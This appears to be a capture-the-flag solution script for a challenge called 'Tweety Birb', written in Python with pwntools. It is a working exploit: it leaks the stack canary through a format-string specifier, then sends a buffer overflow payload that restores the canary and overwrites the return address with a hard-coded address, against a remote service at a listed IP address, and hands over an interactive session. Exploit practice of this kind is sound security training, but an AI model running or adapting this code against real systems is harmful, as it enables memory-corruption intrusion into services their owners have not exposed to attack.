Tweety Birb
#!/usr/bin/env python3
from pwn import *
# Load the challenge binary and make it the pwntools context binary, so that
# packing helpers such as p64() follow the ELF's architecture settings.
exe = context.binary = ELF("./tweetybirb")
# context.log_level = 'critical'

# NOTE(review): assigning these here overrides any LOCAL / DEBUG switch given
# on the command line, so conn() always takes the remote branch as written.
args.LOCAL = False
args.DEBUG = False
def conn():
    """Open the tube used by the script and return it.

    With ``args.LOCAL`` unset the function connects to the remote challenge
    service. With it set, the local binary is spawned instead, and a gdb
    session is attached to that process when ``args.DEBUG`` is also set.
    """
    if not args.LOCAL:
        return remote("143.198.184.186", 5002)

    tube = process([exe.path])
    if args.DEBUG:
        # Debugger attach only makes sense for the locally spawned process.
        gdb.attach(tube)
    return tube
def main():
    """Read a leaked stack value at the first prompt, then send the payload.

    The script answers the ``magpies?`` prompt with a positional format
    specifier and reads back two lines; the second is parsed as hex and used
    as the stack canary. It then answers the ``fowl?`` prompt with 72 filler
    bytes, the leaked value, 8 more filler bytes and a hard-coded address,
    and finally hands the connection to the user.
    """
    io = conn()

    # The service presumably passes this input to a printf-style call as the
    # format string; slot 15 is the author's finding for this build and is
    # not derivable from the script itself.
    io.sendlineafter(b'magpies?', b"%15$lp")
    leaked = io.recvlines(2)[1]
    print(str(leaked))

    # A canary only protects a frame while its value stays secret: once it
    # can be read back, the write below restores it in place and the
    # integrity check passes.
    canary = int(leaked, 16)
    # NOTE(review): the page does not say what lives at this address.
    return_target = 0x004011db
    payload = b"".join([
        b'A' * 72,            # filler up to the canary slot
        p64(canary),          # leaked value written back unchanged
        b'A' * 8,             # presumably the saved frame pointer
        p64(return_target),   # overwritten return address
    ])

    io.sendlineafter(b'fowl?', payload)
    io.interactive()
# Run only when executed as a script, not when the module is imported.
if __name__ == "__main__":
    main()